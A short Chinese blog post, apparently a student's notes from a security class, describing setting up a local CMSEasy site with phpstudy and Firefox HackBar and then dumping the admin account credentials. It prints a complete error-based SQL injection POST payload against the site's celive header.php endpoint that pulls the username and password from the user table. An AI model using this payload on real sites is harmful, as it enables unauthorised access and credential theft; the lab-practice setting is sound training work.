本文介绍如何使用火狐浏览器、phpstudy等工具搭建本地网站,并通过SQL注入技巧解密管理员账户密码的过程。涉及网站安装配置、数据库操作及安全漏洞利用等内容。
任务:搭建一个网站,解密管理员账户密码
先下个火狐,phpstudy,
把压缩包里面的文件解压,把
火狐打开
查找hackbar,添加到火狐并重启软件。会有这个框框
访问127.0.0.1/install,得到这个网站
勾选新建数据库,检查安装,然后安装,然后就登陆这个,然后
然后登陆http://127.0.0.1/,这边网站这块线放一放。我们回到phpstudy,右键phpstudy,MYSQL工具->MYSQL命令行,
密码root,然后输入show databases;然后…………(然后这命令行的部分我就没跟上了,直接用的大佬的结果破解,有时间看看大佬的录播,看看sql)
然后我们回到火狐访问http://127.0.0.1/celive/live/header.php,在hackbar里勾选Enable
post data,然后在Post data里输入xajax=LiveMessage&xajaxargs[0][name]=1',(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(select concat(username,0x23,password) from cmseasy_user where groupid=2 limit 1))a from information_schema.tables group by a)b),'','','','1','127.0.0.1','2')#
点Execute,具体看图
然后会出现
学姐讲的可以,无私奉献,要求不要太高了,我这么笨的人都听懂了,相信学姐的讲课是成功的(就是以后要自己看视频学习,没有激情啊)
扫一扫
900
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
